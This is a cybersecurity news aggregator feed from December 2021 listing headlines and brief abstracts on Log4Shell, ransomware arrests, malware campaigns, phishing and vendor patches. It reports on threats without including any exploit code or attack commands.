Abstract
Threat actors are installing a malicious IIS web server module named 'Owowa' on Microsoft Exchange Outlook Web Access servers to steal credentials and execute commands on the server remotely.BleepingComputer
December 14, 2021 – Vulnerabilities
Zero-Day Vulnerability in Hillrom Cardiology Devices Could Allow Attackers to Seize Control Full Text
Abstract
A high-severity vulnerability in several cardiac healthcare devices could allow attackers to access privileged accounts without a password and seize control of the devices.The Daily Swig
December 14, 2021 – Malware
Anubis Android malware returns to target 394 financial apps Full Text
Abstract
The Anubis Android banking malware is now targeting the customers of nearly 400 financial institutions in a new malware campaign.BleepingComputer
December 14, 2021 – Outage
Cyberattack on BHG opioid treatment network disrupts patient care Full Text
Abstract
Opioid treatment network Behavioral Health Group suffered a cyberattack that led to an almost week-long disruption of IT systems and patient care.BleepingComputer
December 14, 2021 – Government
CISA orders federal agencies to patch Log4Shell by December 24th Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell remote code execution vulnerability and released mitigation guidance in response to active exploitation.BleepingComputer
December 14, 2021 – Vulnerabilities
Log4j: List of vulnerable products and vendor advisories Full Text
Abstract
News about a critical vulnerability in the Apache Log4j logging library broke last week when proof-of-concept exploits started to emerge on Thursday.BleepingComputer
December 13, 2021 – Criminals
Ransomware Affiliate Arrested in Romania; 51 Stolen Data Brokers Arrested in Ukraine Full Text
Abstract
Europol, the European Union's premier law enforcement agency, has announced the arrest of a third Romanian national for his role as a ransomware affiliate suspected of hacking high-profile organizations and companies and stealing large volumes of sensitive data. The 41-year-old unnamed individual was apprehended Monday morning at his home in Craiova, Romania, by the Romanian Directorate for Investigating Organized Crime and Terrorism ( DIICOT ) following a joint investigation in collaboration with the U.S. Federal Bureau of Investigation (FBI). It's not currently known which ransomware gang the suspect was working with, but the development comes a little over a month after Romanian authorities arrested two affiliates of the REvil ransomware family, who are believed to have orchestrated no fewer than 5,000 ransomware attacks and extorted close to $600,000 from victims. Affiliates play a key role in ransomware-as-a-service (RaaS) subscription-based business models, and aThe Hacker News
December 13, 2021 – General
Where the Latest Log4Shell Attacks Are Coming From Full Text
Abstract
Analysts find at least 10 Linux botnets actively exploiting Log4Shell flaw.Threatpost
December 13, 2021 – Vulnerabilities
Latest Apple iOS Update Patches Remote Jailbreak Exploit for iPhones Full Text
Abstract
Apple on Monday released updates to iOS , macOS , tvOS , and watchOS with security patches for multiple vulnerabilities, including a remote jailbreak exploit chain as well as a number of critical issues in the Kernel and Safari web browser that were first demonstrated at the Tianfu Cup held in China two months ago. Tracked as CVE-2021-30955, the issue could have enabled a malicious application to execute arbitrary code with kernel privileges. Apple said it addressed the issue with "improved state handling." The flaw also impacts macOS devices. "The kernel bug CVE-2021-30955 is the one we tried [to] use to build our remote jailbreak chain but failed to complete on time," Kunlun Lab's chief executive, @mj0011sec, said in a tweet. A set of kernel vulnerabilities were eventually harnessed by the Pangu Team at the Tianfu hacking contest to break into an iPhone13 Pro running iOS 15, a feat that netted the white hat hackers $330,000 in cash rewards. BesidThe Hacker News
December 13, 2021 – Breach
Malicious PyPI Code Packages Rack Up Thousands of Downloads Full Text
Abstract
The Python code repository was infiltrated by malware bent on data exfiltration from developer apps and more.Threatpost
December 13, 2021 – Vulnerabilities
Update Google Chrome to Patch New Zero-Day Exploit Detected in the Wild Full Text
Abstract
Google has rolled out fixes for five security vulnerabilities in its Chrome web browser, including one which it says is being exploited in the wild, making it the 17th such weakness to be disclosed since the start of the year. Tracked as CVE-2021-4102 , the flaw relates to a use-after-free bug in the V8 JavaScript and WebAssembly engine, which could have severe consequences ranging from corruption of valid data to the execution of arbitrary code. An anonymous researcher has been credited with discovering and reporting the flaw. As it stands, it's not known how the weakness is being abused in real-world attacks, but the internet giant issued a terse statement that said, "it's aware of reports that an exploit for CVE-2021-4102 exists in the wild." This is done so in an attempt to ensure that a majority of users are updated with a fix and prevent further exploitation by other threat actors. CVE-2021-4102 is the second use-after-free vulnerability in V8 the compThe Hacker News
December 13, 2021 – Vulnerabilities
Google pushes emergency Chrome update to fix zero-day used in attacks Full Text
Abstract
Google has released Chrome 96.0.4664.110 for Windows, Mac, and Linux, to address a high-severity zero-day vulnerability exploited in the wild.BleepingComputer
December 13, 2021 – Cryptocurrency
Cryptocurrency Exchange AscendEX Discloses Hacking Incident Involving Illicit Transactions from Hot Wallets Full Text
Abstract
The largest share of the $77 million was accounted for by the relatively minor taraxa (TARA) with $10.8 million, while the combined shares of stablecoins USDT and USDC accounted for $10.7 million.Yahoo! Finance
December 13, 2021 – Hacker
Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group Full Text
Abstract
A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021. The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, Accenture's Cyber Investigations, Forensics and Response (CIFR) team said in a report published on December 10. "The threat group is financially motivated, opportunistic in nature, and so far, appears to target smaller companies or corporate subsidiaries versus the alternative big game hunting approach," the CIFR team said . "Based on intrusion analysis to date, the threat group focuses solely on data exfiltration and subsequent extortion, rather than the more destructive ransomware deployment." 95% of the known victims are based in North America, while the remaining 5% are inThe Hacker News
December 13, 2021 – Government
Responding to Fischerkeller on Initiative Persistence Full Text
Abstract
The U.S. may be justified in seeking to contain China’s aggression and search for dominance in cyberspace with the 2018 USCC Command Vision. But it has yet to square this with a willingness to accept similar Chinese efforts to advance Chinese goals in cyberspace.Lawfare
December 13, 2021 – Vulnerabilities
Practical coexistence attacks on billions of WiFi chips allow data theft and traffic manipulation Full Text
Abstract
Boffins discovered bugs in WiFi chips that can be exploited to extract passwords and manipulate traffic by targeting a device's Bluetooth component. A group of researchers from the University of Darmstadt, University of Brescia, CNIT, and the Secure...Security Affairs
December 13, 2021 – Outage
Kronos Ransomware Outage Drives Widespread Payroll Chaos Full Text
Abstract
Kronos, the workforce-management provider, said a weeks-long outage of its cloud services is in the offing, just in time to hamstring end-of-year HR activities like bonuses and vacation tracking.Threatpost
December 13, 2021 – Malware
TinyNuke info-stealing malware is again attacking French users Full Text
Abstract
The info-stealing malware TinyNuke has re-emerged in a new campaign targeting French users with invoice-themed lures in emails sent to corporate addresses and individuals working in manufacturing, technology, construction, and business services.BleepingComputer
December 13, 2021 – Criminals
Romanian ransomware suspect arrested in joint Europol, FBI operation Full Text
Abstract
A Romanian man accused of using ransomware to hack high-profile organizations and companies was arrested Monday as part of a joint operation between the Romanian National Police, the FBI, and Europol.Cyberscoop
December 13, 2021 – General
Top 3 SaaS Security Threats for 2022 Full Text
Abstract
With 2021 drawing to a close and many closing their plans and budgets for 2022, the time has come to do a brief wrap-up of the SaaS Security challenges on the horizon. Here are the top 3 SaaS security posture challenges as we see them. 1 — The Mess of Misconfiguration Management The good news is that more businesses than ever are using SaaS apps such as GitHub, Microsoft 365, Salesforce, Slack, SuccessFactors, Zoom, and many others, to enable employees to maintain productivity under the most challenging of circumstances. As for the bad news, many companies are having a hard time adequately addressing the ever-changing security risks of each app. This challenge begins with a simple miscalculation—businesses are tasking security teams to ensure that the security configurations for each app are set correctly. While that may seem like the logical choice, these apps are like snowflakes, no two are the same, including their specific settings and configurations. This is exacerbatedThe Hacker News
December 13, 2021 – Vulnerabilities
CISA adds Log4Shell Log4j flaw to the Known Exploited Vulnerabilities Catalog Full Text
Abstract
The U.S. CISA added 13 new vulnerabilities to the Known Exploited Vulnerabilities Catalog, including Apache Log4Shell Log4j and Fortinet FortiOS issues. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 13 new vulnerabilities...Security Affairs
December 13, 2021 – Phishing
Phishing campaign uses PowerPoint macros to drop Agent Tesla Full Text
Abstract
A new variant of the Agent Tesla malware has been spotted in an ongoing phishing campaign that relies on Microsoft PowerPoint documents laced with malicious macro code.BleepingComputer
December 13, 2021 – Malware
TinyNuke Banking Malware Resurges with Invoice-themed Malspam Aimed at French Entities Full Text
Abstract
The campaigns use invoice-themed lures to target hundreds of customers of organizations in various industries including manufacturing, technology, construction, and business services.Proof Point
December 13, 2021 – Malware
Microsoft Details Building Blocks of Widely Active Qakbot Banking Trojan Full Text
Abstract
Infection chains associated with the multi-purpose Qakbot malware have been broken down into "distinct building blocks," an effort that Microsoft said will help to proactively detect and block the threat in an effective manner. The Microsoft 365 Defender Threat Intelligence Team dubbed Qakbot a "customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it." Qakbot is believed to be the creation of a financially motivated cybercriminal threat group known as Gold Lagoon . It is a prevalent information-stealing malware that, in recent years, has become a precursor to many critical and widespread ransomware attacks, offering a malware installation-as-a-service that enables many campaigns. First discovered in 2007, the modular malware — like TrickBot — has evolved from its early roots as a banking trojan to become a Swiss Army knife capable of data exfiltration and acting as a delivery mechanism for the second stThe Hacker News
December 13, 2021 – Vulnerabilities
Log4Shell was in the wild at least nine days before public disclosure Full Text
Abstract
Threat actors are already abusing Log4Shell vulnerability in the Log4j library for malicious purposes such as deploying malware. A few hours ago, researchers at NetLab 360 reported that their Anglerfish and Apacket honeypots were already hit by attacks...Security Affairs
December 13, 2021 – Vulnerabilities
Dell driver fix still allows Windows Kernel-level attacks Full Text
Abstract
Dell's driver fix of the CVE-2021-21551 vulnerability leaves margin for catastrophic BYOVD attacks resulting in Windows kernel driver code execution.BleepingComputer
December 13, 2021 – Malware
Hancitor maldoc drops via Windows Clipboard Full Text
Abstract
Hancitor, a malware loader that provides Malware-as-a-Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more.McAfee
December 13, 2021 – Botnet
Two Linux botnets already exploit Log4Shell flaw in Log4j Full Text
Abstract
Immediately after the disclosure of the Log4Shell flaw in Log4j library threat actors started including the exploit code in Linux botnets. Researchers at NetLab 360 reported that their Anglerfish and Apacket honeypots were already hit by attacks...Security Affairs
December 13, 2021 – Ransomware
Kronos ransomware attack may cause weeks of HR solutions downtime Full Text
Abstract
Workforce management solutions provider Kronos has suffered a ransomware attack that will likely disrupt many of their cloud-based solutions for weeks.BleepingComputer
December 13, 2021 – Policy and Law
Germany Jails Operators of ‘Cyberbunker’ Darknet Hub Full Text
Abstract
They are said to have hosted, or provided the internet architecture for, illegal websites tha peddled stolen data and forged documents, and from which large-scale cyberattacks were carried out.Security Week
December 13, 2021 – Vulnerabilities
Attackers can get root by crashing Ubuntu’s AccountsService Full Text
Abstract
A local privilege escalation security vulnerability could allow attackers to gain root access on Ubuntu systems by exploiting a double-free memory corruption bug in GNOME's AccountsService component.BleepingComputer
December 13, 2021 – General
How C-suite executives perceive their organizations’ readiness for ransomware attacks Full Text
Abstract
A new (ISC)² study underscores the need for better communication between security teams and executives and offers best practices security leaders should implement to improve those interactions.Help Net Security
December 13, 2021 – Vulnerabilities
Attackers can get root by crashing Ubuntu’s AccountsService Full Text
Abstract
A local privilege escalation security vulnerability could allow attackers to gain root access on Ubuntu systems by exploiting a double-free memory corruption bug in GNOME's AccountsService component.BleepingComputer
December 13, 2021 – General
EV certificate usage declining: Is the internet becoming more secure? Full Text
Abstract
According to Venafi, 72% of sites now actively redirect traffic to use HTTPS, a 15% increase since March 2020. Almost one in five of the top 1 million sites now use HSTS, a 44% rise since March 2020.Help Net Security
December 13, 2021 – Vulnerabilities
Bugs in billions of WiFi, Bluetooth chips allow password, data theft Full Text
Abstract
Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves it's possible to extract passwords and manipulate traffic on a WiFi chip by targeting a device's Bluetooth component.BleepingComputer
December 13, 2021 – Phishing
A phishing campaign targets clients of German banks using QR codes Full Text
Abstract
The messages used in a campaign recently discovered by Cofense use QR codes to deceive users of two Geman banks, Sparkasse and Volksbanken Raiffeisenbanken, and steal digital banking information.Security Affairs
December 13, 2021 – Criminals
Ukraine arrests 51 for selling data of 300 million people in US, EU Full Text
Abstract
Ukrainian law enforcement arrested 51 suspects believed to have been selling stolen personal data on hacking forums belonging to hundreds of millions worldwide, including Ukraine, the US, and Europe.BleepingComputer
December 13, 2021 – Hacker
Hacker Poses As Support Rep to Breach Cox Communications Full Text
Abstract
The impacted data includes the Cox account number, access PIN, security questions and answers, list of active Cox services, Cox.net email address, name, address, and phone number of many customers.Forbes
December 13, 2021 – Criminals
Police arrests ransomware affiliate behind high-profile attacks Full Text
Abstract
Romanian law enforcement authorities arrested a ransomware affiliate suspected of hacking and stealing sensitive info from the networks of multiple high-profile companies worldwide, including a large Romanian IT company with clients from the retail, energy, and utilities sectors.BleepingComputer
December 13, 2021 – Malware
Malicious PyPI packages with over 10,000 downloads taken down Full Text
Abstract
The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers' report.BleepingComputer
December 12, 2021 – Vulnerabilities
Apache Log4j Vulnerability — Log4Shell — Widely Under Active Attack Full Text
Abstract
Threat actors are actively weaponizing unpatched servers affected by the newly identified " Log4Shell " vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light. Netlab, the networking security division of Chinese tech giant Qihoo 360, disclosed threats such as Mirai and Muhstik (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ( CVE-2021-26084 , CVSS score: 9.8) earlier this September. The latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on DThe Hacker News
December 12, 2021 – Hacker
Hackers start pushing malware in worldwide Log4Shell attacks Full Text
Abstract
Threat actors and researchers are scanning for and exploiting the Log4j Log4Shell vulnerability to deploy malware or find vulnerable servers. In this article we compiled the known payloads, scans, and attacks using the Log4j vulnerability.BleepingComputer
December 12, 2021 – Outage
Quebec shuts down thousands of sites as disclosure of the Log4Shell flaw Full Text
Abstract
Quebec shut down nearly 4,000 of its sites in response to the discovery of the Log4Shell flaw in the Apache Log4j Java-based logging library. Quebec shut down nearly 4,000 of its sites as a preventative measure after the disclosure of a PoC exploit...Security Affairs
December 12, 2021 – General
FTC: Americans lost $148 million to gift card scams this year Full Text
Abstract
The US Federal Trade Commission (FTC) said Americans reported losing $148 million to gift card scams during the first nine months of 2021 following a major increase compared to last year.BleepingComputer
December 12, 2021 – Policy and Law
Russian nation sentenced to 48 months in prison for helping Kelihos Botnet to evade detection Full Text
Abstract
A United States court has sentenced to four years in prison for the Russian citizen Oleg Koshkin for his role in Kelihos Botnet development. Oleg Koshkin (41) has been sentenced to 48 months in prison for one count of conspiracy to commit computer...Security Affairs
December 12, 2021 – Phishing
A phishing campaign targets clients of German banks using QR codes Full Text
Abstract
Cofense researchers discovered a new phishing campaign using QR codes targeting German e-banking users in the last weeks. Threat actors continue to use multiple techniques to avoid detection and trick recipients into opening phishing messages, including...Security Affairs
December 12, 2021 – General
Security Affairs newsletter Round 344 Full Text
Abstract
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here....Security Affairs
December 11, 2021 – Vulnerabilities
MANGA Found Targeting RCE Vulnerability in TP-Link Product Full Text
Abstract
Botnet operator MANGA was spotted abusing a recently disclosed vulnerability to hijack TP-Link routers and add them to their network of hacked devices. Attackers started exploiting the flaw just two weeks after TP-Link released the firmware update. E xperts recommend always updating devices regu ... Read MoreCyware Alerts - Hacker News
December 11, 2021 – Ransomware
BlackCat: A New Sophisticated Ransomware in Rust Full Text
Abstract
Researchers unearth the first professional ransomware variant written in Rust dubbed BlackCat. It can target Windows, Linux, and VMWare ESXi systems. The threat group uses a double extortion model and looks for partners to whom it offers a huge 80%–90% ransom cut. As per claims, the author of Bl ... Read MoreCyware Alerts - Hacker News
December 11, 2021 – Malware
Microsoft: These are the building blocks of QBot malware attacks Full Text
Abstract
As QBot campaigns increase in size and frequency, researchers are looking into ways to break the trojan's distribution chain and tackle the threat.BleepingComputer
December 11, 2021 – Botnet
Moobot Botnet Eyes Hikvision Products Full Text
Abstract
Moobot, a Mirai-based botnet, is reportedly abusing a critical flaw in the webserver of many Hikvision products, which were sanctioned by the U.S. in the wake of human rights abuse. The botnet is abusing a critical command injection flaw to target unpatched devices and extract sensitive data from v ... Read MoreCyware Alerts - Hacker News
December 11, 2021 – Vulnerabilities
Western Digital SanDisk SecureAccess flaws allow brute force and dictionary attacks Full Text
Abstract
Vulnerabilities in the Western Digital SanDisk SecureAccess can be exploited to access user data through brute force and dictionary attacks. Western Digital has released updates for its SanDisk SecureAccess software to fix multiple vulnerabilities...Security Affairs
December 11, 2021 – Criminals
New ‘Karakurt’ cybercrime gang focuses on data theft and extortion Full Text
Abstract
Accenture researchers detailed the activity of a new sophisticated cybercrime group, called Karakurt, behind recent cyberattacks. Accenture researchers detailed the activity of a sophisticated financially motivated threat actor called Karakurt. The activity...Security Affairs
December 11, 2021 – Solution
Cybereason released Logout4Shell, a vaccine for Log4Shell Apache Log4j RCE Full Text
Abstract
Cybereason researchers released a "vaccine" that mitigates the critical 'Log4Shell' Apache Log4j code execution vulnerability. Chinese security researcher p0rz9 publicly disclosed a Proof-of-concept exploit for a critical remote code execution zero-day...Security Affairs
December 10, 2021 – Solution
Extremely Critical Log4J Vulnerability Leaves Much of the Internet at Risk Full Text
Abstract
The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems. Tracked as CVE-2021-44228 and by the monikers Log4Shell or LogJam, the issue concerns a case of unauthenticated, remote code execution (RCE) on any application that uses the open-source utility and affects versions Log4j 2.0-beta9 up to 2.14.1. The bug has scored a perfect 10 on 10 in the CVSS rating system, indicative of the severity of the issue. "An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled," the Apache Foundation said in an advisory. "From Log4j 2.15.0, this behavior has been disabled by default." Exploitation can be achieved by a single string of text, which cThe Hacker News
December 10, 2021 – Solution
Researchers release ‘vaccine’ for critical Log4Shell vulnerability Full Text
Abstract
Researchers from cybersecurity firm Cybereason has released a "vaccine" that can be used to remotely mitigate the critical 'Log4Shell' Apache Log4j code execution vulnerability running rampant through the Internet.BleepingComputer
December 10, 2021 – Attack
Over 1.6 Million WordPress Sites Targeted in Couple of Days with Attacks on Plugins and Themes Full Text
Abstract
Wordfence researchers spotted a massive wave of attacks in the days that are targeting over 1.6 million WordPress sites from 16,000 IPs via four different plugins and several Epsilon Framework themes.Security Affairs
December 10, 2021 – Government
Officials press for actionable recommendations from new cyber advisory committee Full Text
Abstract
Top officials at the Department of Homeland Security (DHS) on Friday urged a newly established advisory committee composed of experts from across sectors to propose solutions to help tackle the growing wave of cyberattacks faced by the nation.The Hill
December 10, 2021 – Ransomware
BlackCat: A New Rust-based Ransomware Malware Spotted in the Wild Full Text
Abstract
Details have emerged about what's the first Rust-language-based ransomware strain spotted in the wild that has already amassed "some victims from different countries" since its launch last month. The ransomware, dubbed BlackCat , was disclosed by MalwareHunterTeam. "Victims can pay with Bitcoin or Monero," the researchers said in a series of tweets detailing the file-encrypting malware. "Also looks they are giving credentials to intermediaries" for negotiations. BlackCat, akin to many other variants that have sprung before it, operates as a ransomware-as-a-service (RaaS), wherein the core developers recruit affiliates to breach corporate environments and encrypt files, but not before stealing the said documents in a double extortion scheme to pressure the targets into paying the requested amount or risk exposure of the stolen data should the companies refuse to pay up. Security researcher Michael Gillespie called it a "very sophisticatedThe Hacker News
December 10, 2021 – Vulnerabilities
What’s the Deal with the Log4Shell Security Nightmare? Full Text
Abstract
The details behind a massive cyber problem.Lawfare
December 10, 2021 – Breach
Volvo Cars suffers a data breach. Is it a ransomware attack? Full Text
Abstract
Swedish automotive manufacturer Volvo Cars revealed that has suffered a cyberattack that resulted in the theft of R&D data. Swedish automotive manufacturer Volvo Cars revealed that threat actors have stolen R&D data from its systems. In...Security Affairs
December 10, 2021 – Education
Next-Gen Maldocs & How to Solve the Human Vulnerability Full Text
Abstract
Malicious email attachments with macros are one of the most common ways hackers get in through the door. Huntress security researcher John Hammond discusses how threat hunters can fight back.Threatpost
December 10, 2021 – Ransomware
The Week in Ransomware - December 10th 2021 - Project CODA Full Text
Abstract
This week has quite a bit of ransomware news, including arrests, a new and sophisticated ransomware, and an attack bringing down 300 supermarkets in England.BleepingComputer
December 10, 2021 – Malware
Decade-old Modular Banking Trojan Adds Capability of Delivering Ransomware Payloads Full Text
Abstract
Qakbot has in the past year started delivering ransomware and this new business model is making it harder for network defenders to detect what is and isn't a Qakbot attack.ZDNet
December 10, 2021 – Government
Officials, experts sound the alarm about critical cyber vulnerability Full Text
Abstract
Officials and cyber experts on Friday sounded the alarm about a critical logging vulnerability that could potentially impact thousands of organizations, racing to implement patches before hackers can exploit the opening.The Hill
December 10, 2021 – Attack
1.6 Million WordPress Sites Under Cyberattack From Over 16,000 IP Addresses Full Text
Abstract
As many as 1.6 million WordPress sites have been targeted by an active large-scale attack campaign originating from 16,000 IP addresses by exploiting weaknesses in four plugins and 15 Epsilon Framework themes. WordPress security company Wordfence, which disclosed details of the attacks, said Thursday it had detected and blocked more than 13.7 million attacks aimed at the plugins and themes in a period of 36 hours with the goal of taking over the websites and carrying out malicious actions. The plugins in question are Kiwi Social Share (<= 2.0.10), WordPress Automatic (<= 3.53.2), Pinterest Automatic (<= 4.14.3), and PublishPress Capabilities (<= 2.3), some of which have been patched dating all the way back to November 2018. The impacted Epsilon Framework themes and their corresponding versions are as follow — Activello (<=1.4.1) Affluent (<1.1.0) Allegiant (<=1.2.5) Antreas (<=1.0.6) Bonkers (<=1.0.5) Brilliance (<=1.2.9) Illdy (<=2.1.6)The Hacker News
December 10, 2021 – Government
Australian ACSC warns of Conti ransomware attacks against local orgs Full Text
Abstract
The Australian Cyber Security Centre (ACSC) warns of Conti ransomware attacks again multiple Australian organizations. The Australian Cyber Security Centre (ACSC) warns of Conti ransomware attacks against multiple Australian organizations from various...Security Affairs
December 10, 2021 – Phishing
‘Appalling’ Riot Games Job Fraud Takes Aim at Wallets Full Text
Abstract
Scammers are using fake job listings to empty the wallets of young, hopeful victims looking to break into the gaming industry.Threatpost
December 10, 2021 – Phishing
Phishing attacks use QR codes to steal banking credentials Full Text
Abstract
A new phishing campaign that targets German e-banking users has been underway in the last couple of weeks, involving QR codes in the credential-snatching process.BleepingComputer
December 10, 2021 – Vulnerabilities
Microsoft and GitHub OAuth Implementation Vulnerabilities Lead to Redirection Attacks Full Text
Abstract
Vulnerabilities in Microsoft and others’ popular OAuth2.0 implementations lead to redirection attacks that bypass most phishing detection solutions and email security solutions.Proof Point
December 10, 2021 – Privacy
Russia Blocks Tor Privacy Service in Latest Censorship Move Full Text
Abstract
Russia has stepped up its censorship efforts in the country by fully blocking access to the Tor web anonymity service, coinciding with the ban of six virtual private network (VPN) operators, as the government continues its efforts to control the internet and crack down on attempts to circumvent locally imposed web restrictions. The Federal Service for Supervision of Communications, Information Technology and Mass Media, also known as Roskomnadzor, the watchdog responsible for monitoring, controlling and censoring Russian mass media, announced the block, accusing it of enabling access to illegal content, Reuters reported this week. Russia accounts for 15% of all Tor users, with more than 310,000 daily users, second only to the U.S. Tor, short for The Onion Router, enables users to automatically encrypt and reroute their web requests through a network of Tor relays for anonymizing network traffic, as well as help bypass censorship and protect their identities from the internThe Hacker News
December 10, 2021 – Vulnerabilities
A zero-day exploit for Log4j Java library could have a tsunami impact on IT giants Full Text
Abstract
Experts publicly disclose Proof-of-concept exploits for a critical zero-day vulnerability in the Apache Log4j Java-based logging library. Experts publicly disclose Proof-of-concept exploits for a critical remote code execution zero-day vulnerability,...Security Affairs
December 10, 2021 – Breach
Volvo Cars discloses security breach leading to R&D data theft Full Text
Abstract
Swedish carmaker Volvo Cars has disclosed that unknown attackers have stolen research and development information after hacking some of its servers.BleepingComputer
December 10, 2021 – Vulnerabilities
Mozilla Patches High-Severity Vulnerabilities in Firefox, Thunderbird Full Text
Abstract
If exploited, the most severe of these security bugs could allow attackers to execute arbitrary code within the context of the vulnerable application, which could lead to full system compromise.Security Week
December 10, 2021 – Attack
1.6 million WordPress sites targeted in the last couple of days Full Text
Abstract
Wordfence experts detected a massive wave of attacks in the last couple of days that targeted over 1.6 million WordPress sites. Wordfence researchers spotted a massive wave of attacks in the days that are targeting over 1.6 million...Security Affairs
December 10, 2021 – Vulnerabilities
Minecraft rushes out patch for critical Log4j vulnerability Full Text
Abstract
Swedish video game developer Mojang Studios has released an emergency Minecraft security update to address a critical bug in the Apache Log4j Java logging library used by the game's Java Edition client and multiplayer servers.BleepingComputer
December 10, 2021 – Malware
PHP Re-Infectors – The Malware that Keeps On Giving Full Text
Abstract
Attackers usually replace the index.php with an infected copy of the WordPress index.php file and also add hundreds or thousands of infected .htaccess files throughout the website directories.Sucuri
December 10, 2021 – Malware
BlackCat ransomware, a very sophisticated malware written in Rust Full Text
Abstract
BlackCat is the first professional ransomware strain that was written in the Rust programming language, researchers reported. Malware researchers from Recorded Future and MalwareHunterTeam discovered ALPHV (aka BlackCat), the first professional...Security Affairs
December 10, 2021 – Government
Australian govt raises alarm over Conti ransomware attacks Full Text
Abstract
The Australian Cyber Security Centre (ACSC) says Conti ransomware attacks have targeted multiple Australian organizations from various industry verticals since November.BleepingComputer
December 10, 2021 – Attack
Ransomware Attack at Payroll Provider Frontier Software Leaks Data on Australian Government Workers Full Text
Abstract
South Australia Treasurer Rob Lucas said on Friday that state government employee data has been exfiltrated as part of a ransomware attack on payroll provider Frontier Software.ZDNet
December 10, 2021 – Hacker
New ‘Karakurt’ hacking group focuses on data theft and extortion Full Text
Abstract
A sophisticated cybercrime group known as 'Karakurt' who has been quietly working from the shadows has had its tactics and procedures exposed by researchers who tracked recent cyberattacks conducted by the hackers.BleepingComputer
December 10, 2021 – Government
How CISA’s New Patching Directive Can Drive Cyber Hygiene Full Text
Abstract
The US federal agencies have two weeks to close the vulnerabilities published in 2021 and six months for older Common Vulnerabilities and Exposures (CVEs) — some of which date back to 2014.CIO
December 10, 2021 – Breach
Data breach impacts 80,000 South Australian govt employees Full Text
Abstract
The South Australian government has admitted that the personal details of tens of thousands of its employees were compromised following a cyber-attack on an external payroll software provider.BleepingComputer
December 10, 2021 – General
Beware of ransomware attacks between Christmas and New Year’s! Full Text
Abstract
Darktrace researchers discovered a 30% rise in the average number of attempted ransomware attacks over the holiday season in every consecutive year from 2018 to 2020 compared to the monthly average.Help Net Security
December 10, 2021 – Vulnerabilities
New zero-day exploit for Log4j Java library is an enterprise nightmare Full Text
Abstract
Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to ongoing remote code execution attacks.BleepingComputer
December 10, 2021 – Vulnerabilities
Flaw in Widely Used Java-based Logging Utility Poses Grave Threat to Multiple Applications Full Text
Abstract
Exploit code has been released for a serious code-execution vulnerability in Log4j, which is used by large enterprises and also in Java versions of Minecraft, several websites reported last Thursday.ARS Technica
December 10, 2021 – Attack
Massive attack against 1.6 million WordPress sites underway Full Text
Abstract
Wordfence analysts report having detected a massive wave of attacks in the last couple of days, originating from 16,000 IPs and targeting over 1.6 million WordPress sites.BleepingComputer
December 10, 2021 – Policy and Law
DOJ gives Russian national two-year sentence for work shielding Kelihos malware and other ransomware Full Text
Abstract
The DoJ sentenced Oleg Koshkin to two years in prison for his work in helping to "conceal" the Kelihos malware and other ransomware from antivirus software. He was facing up to 15 years in prison.ZDNet
December 9, 2021 – Criminals
Canadian Ransomware Arrest Is a Meaningful Flex, Experts Say Full Text
Abstract
U.S. and Canada charge Ottawa man for ransomware attacks, signaling that North America is no cybercriminal haven.Threatpost
December 9, 2021 – Botnet
Fueled by Pandemic Realities, Grinchbots Aggressively Surge in Activity Full Text
Abstract
E-commerce’s proverbial Who-ville is under siege, with a rise in bots bent on ruining gift cards and snapping up coveted gifts for outrageously priced resale.Threatpost
December 9, 2021 – Vulnerabilities
How MikroTik Routers Became a Cybercriminal Target Full Text
Abstract
The powerful devices leveraged by the Meris botnet have weaknesses that make them easy to exploit, yet complex for organizations to track and secure, researchers said.Threatpost
December 09, 2021 – Solution
Kali Linux 2021.4 released with 9 new tools, further Apple M1 support Full Text
Abstract
Kali Linux 2021.4 was released today by Offensive Security and includes further Apple M1 support, increased Samba compatibility, nine new tools, and an update for all three main desktop.BleepingComputer
December 9, 2021 – APT
SideCopy APT Targets Indian and Afghan Governments Full Text
Abstract
Researchers discovered that the SideCopy APT group targeted government officials in India and Afghanistan via the new AuTo data stealer for cyberespionage. Hackers use ActionRAT and AuTo Stealer malware in this campaign. Government entities are suggested to invest more in security and stay vig ... Read MoreCyware Alerts - Hacker News
December 09, 2021 – Government
US to tighten restrictions on exports of malicious cyber tools Full Text
Abstract
The Biden administration is expected to announce on Friday an initiative to tighten rules surrounding the exports of certain technologies that have been used by authoritarian governments and bad actors for repression.The Hill
December 09, 2021 – Vulnerabilities
Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs Full Text
Abstract
